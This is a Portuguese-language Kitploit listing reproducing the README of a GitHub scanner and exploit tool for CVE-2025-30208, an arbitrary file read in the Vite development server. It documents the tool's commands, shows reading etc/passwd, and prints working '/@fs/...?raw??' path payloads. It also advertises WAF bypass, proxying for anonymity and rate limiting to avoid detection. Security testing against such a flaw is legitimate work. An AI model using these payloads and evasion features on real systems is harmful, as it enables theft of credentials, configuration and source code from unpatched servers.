Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend). | Kitploit
Ferramentas/GitHubGitHub/th-secforge/cve-2025-30208
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend).

Ver Repositório
144há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 CVE-2025-30208 Scanner de Vulnerabilidade de Leitura Arbitrária de Arquivos no Vite

Python License Security Status Modular

Scanner de vulnerabilidade avançado para CVE-2025-30208 com recursos de nível empresarial

Ferramenta profissional de teste de penetração para detecção de leitura arbitrária de arquivos no Vite

🚀 Início Rápido • 📋 Funcionalidades • 🔧 Uso • 📊 Exemplos • 🛡️ Segurança


📖 Visão Geral

Este é um scanner de vulnerabilidade abrangente projetado para detectar e explorar a vulnerabilidade CVE-2025-30208 em servidores de desenvolvimento Vite. A vulnerabilidade permite acesso de leitura arbitrária de arquivos através dos endpoints do sistema de arquivos do Vite, potencialmente expondo arquivos de configuração sensíveis, código-fonte e informações do sistema.

🎯 O Que Esta Ferramenta Faz

  • Detecta instâncias vulneráveis do Vite em redes
  • Explora a vulnerabilidade de leitura arbitrária de arquivos de forma segura
  • Descobre arquivos sensíveis e dados de configuração
  • Reporta descobertas em múltiplos formatos (HTML, JSON, Console)
  • Gerencia sessões de varredura e configurações
  • Lida com erros de forma graciosa com mecanismos de repetição automática

🏗️ Arquitetura Modular

A ferramenta agora possui uma arquitetura modular para melhor manutenibilidade e extensibilidade:

  • CVE-2025-30208.py - Aplicação principal do scanner
  • payloads.py - Payloads de exploração avançados (mais de 60 variações)
  • sensitive_files.py - Banco de dados abrangente de arquivos sensíveis (mais de 200 arquivos)
  • html_template.py - Template aprimorado de relatórios HTML estilo hacker

🚀 Início Rápido

Pré-requisitos

pip3 install -r requirements.txt

Uso Básico

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Funcionalidades

🔍 Detecção de Vulnerabilidade Principal

  • Mais de 60 Payloads Avançados: Técnicas abrangentes de exploração para máxima detecção
  • Detecção Inteligente: Análise inteligente de respostas para evitar falsos positivos
  • Validação em Tempo Real: Validação contínua das respostas do alvo
  • Testes Abrangentes: Testa todos os endpoints vulneráveis conhecidos

🛡️ Recursos de Segurança Aprimorados

  • Suporte a Proxy: Configuração de proxy HTTP/HTTPS para anonimato
  • Cabeçalhos Personalizados: Bypass de WAF/IPS com cabeçalhos HTTP personalizados
  • Limitação de Taxa: Atrasos configuráveis para evitar detecção
  • Gerenciamento de Sessão: Salvar e restaurar sessões de varredura
  • Validação de Entrada: Validação abrangente de parâmetros

🔧 Capacidades Avançadas

  • Varredura em Lote: Varredura multi-thread de múltiplos alvos
  • Descoberta de Arquivos Sensíveis: Descoberta automatizada de mais de 200 arquivos sensíveis
  • Teste de Conectividade: Teste de protocolos TCP/UDP/HTTP/HTTPS
  • Recuperação de Erros: Repetição automática com backoff exponencial
  • Registro Abrangente: Logs detalhados com carimbos de data/hora

📊 Relatórios e Saída

  • 🎨 Relatórios HTML Aprimorados: Relatórios de vulnerabilidade bonitos estilo hacker com animações
  • Exportação JSON: Dados estruturados para análise posterior
  • Saída no Console: Feedback em tempo real com código de cores
  • Arquivos de Log: Trilhas de auditoria detalhadas
  • Interface Web Interativa: Servidor web embutido para visualizar relatórios

🔧 Guia de Uso

1. Configuração Básica

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Teste de Vulnerabilidade

CVE-2025-30208 > run

# Ativar modo verbose para saída detalhada
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Varredura em Lote

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Pressione Enter duas vezes para finalizar]

4. Descoberta de Arquivos Sensíveis

CVE-2025-30208 > scan

5. Configuração Avançada

# Configurar proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Definir cabeçalhos personalizados
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configurar limitação de taxa
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Relatórios HTML Aprimorados

# Gerar relatório HTML bonito
CVE-2025-30208 > pull

# Iniciar servidor web para visualizar o relatório
CVE-2025-30208 > web

# Iniciar servidor web em porta específica
CVE-2025-30208 > web 8081

# Parar servidor web
CVE-2025-30208 > web off

📊 Referência de Comandos

ComandoDescriçãoExemplo
set <opção> <valor>Definir opções de configuraçãoset RHOST 192.168.1.100
show optionsExibir configurações atuaisshow options
editEditor interativo de opçõesedit
run / exploitExecutar teste de vulnerabilidaderun
batchVarredura em lote de múltiplos alvosbatch
scanDescobrir arquivos sensíveisscan
pullExportar resultados para HTML/JSONpull
web [on|off|port]Servidor web para relatórios HTMLweb 8080
saveSalvar configuração da sessãosave
loadCarregar configuração da sessãoload
testTestar conectividade com o alvotest
validateValidar configuração atualvalidate
verboseAlternar modo verboseverbose
proxyConfigurar configurações de proxyproxy
headersDefinir cabeçalhos HTTP personalizadosheaders
rateConfigurar limitação de taxarate
logMostrar informações de registrolog
help / ?Mostrar ajudahelp
exit / quitSair da ferramentaexit

⚙️ Opções de Configuração

OpçãoDescriçãoPadrãoValidação
RHOSTHost/IP alvo-Validação de hostname/IP
RPORTPorta alvo-Faixa de portas (1-65535)
FILEPATHCaminho do arquivo para testeetc/passwdValidação de caminho
PROXYURL do proxy HTTP/HTTPS-Validação de formato de URL
VERBOSEAtivar saída verbosefalseValidação booleana
RATE_LIMITAtraso entre requisições (segundos)0.3Validação numérica
THREADSNúmero de threads para varredura em lote5Validação de inteiro
TIMEOUTTempo limite de requisição (segundos)5Validação de inteiro
CUSTOM_HEADERSCabeçalhos HTTP personalizados (JSON){}Validação de formato JSON

🎨 Sistema de Payload Aprimorado

O scanner agora usa mais de 60 variações diferentes de payload organizadas em payloads.py:

Payloads @fs Principais

/@fs/{caminho_arquivo}?raw??
/@fs/{caminho_arquivo}?raw&url
/@fs/{caminho_arquivo}?import&raw??
/@fs/{caminho_arquivo}?raw&import
/@fs/{caminho_arquivo}?import&url

Variações de Parâmetros Estendidos

/@fs/{caminho_arquivo}?raw&source
/@fs/{caminho_arquivo}?raw&content
/@fs/{caminho_arquivo}?raw&data
/@fs/{caminho_arquivo}?raw&file
/@fs/{caminho_arquivo}?raw&type=text
/@fs/{caminho_arquivo}?raw&format=text
/@fs/{caminho_arquivo}?raw&encoding=utf8
Baixar ferramenta